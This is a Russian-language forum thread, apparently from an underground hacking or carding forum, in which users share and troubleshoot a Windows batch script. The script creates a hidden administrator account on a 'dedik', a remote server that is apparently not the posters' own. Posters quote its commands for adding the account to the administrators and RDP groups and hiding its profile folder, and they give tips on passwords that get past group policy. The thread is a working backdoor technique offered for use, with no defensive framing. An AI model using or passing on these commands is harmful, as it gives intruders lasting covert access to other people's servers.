Защити свои аккаунты качественными и приватными прокси форматов IPv4 и IPv6! - Proxy-seller

Батник для создания скрытой учетки на дедике(работает на всех языках)

hover1

Новичок

Думаю многим пригодится батник, который на всех языках создаёт скрытую учётку:
Только замените ВАШЛОГИН и ВАШПАРОЛЬ, пароль должен быть сложным, иначе не на всех серверах получится создать учетку

Скрытое содержимое. Вам нужно войти или зарегистрироваться.
Создаём текстовый файл, копируем туда текст не забывая поменять логин и пароль и сохраняем с расширением .bat

Skull1972

Legendary

На русском дедике, админскую учётку не создал. Пришлось через lusrmgr.msc в ручную добавлять.

hover1

Новичок

Skull1972

Legendary

Интересно....
" пароль должен быть сложным, иначе не на всех серверах получится создать учетку"
Не, батник учётку создал, но только пользователя, а про админскую написал ошибку, что-то типа (такой группы не сушествует)

hover1

Новичок

Я не претендую на первоисточник, работает и ладно )
У кого не работает пользуйтесь xRdp.v2.1

Kenwood

Legendary

Strell

ГУРУ

***Скрытое содержимое***
только не то же самое. в том батнике который я перекопипастил используется значение %user% , в том же случае ты используешь

net localgroup %AdmGroup% ВАШЛОГИН /add
attrib +H C:\Users\ВАШЛОГИН /S /D
net localgroup "%RDPGroup%" ВАШЛОГИН /add
это не удобно. в каждой строчке надо прописывать свой логин, поэтому люди и пишут , что юзерка создалась не правильно.

Kenwood

Legendary

только не то же самое. в том батнике который я перекопипастил используется значение %user% , в том же случае ты используешь

net localgroup %AdmGroup% ВАШЛОГИН /add
attrib +H C:\Users\ВАШЛОГИН /S /D
net localgroup "%RDPGroup%" ВАШЛОГИН /add
это не удобно. в каждой строчке надо прописывать свой логин, поэтому люди и пишут , что юзерка создалась не правильно.
как раз не надо, логин и пасс пишется только в строках
set user=ИМЯ УЧЁТКИ
set pass=ПАРОЛЬ УЧЁТКИ
остальное всё автоматом из первых значений

HardStyle

Legendary

Пароль всегда ставьте не менее 8 знаков с цифрами, символами и заглавными буквами.
Пример: Dedicatet@com123
Иначе учётка может не создаться согласно правилам групповых политик.

Сверху Снизу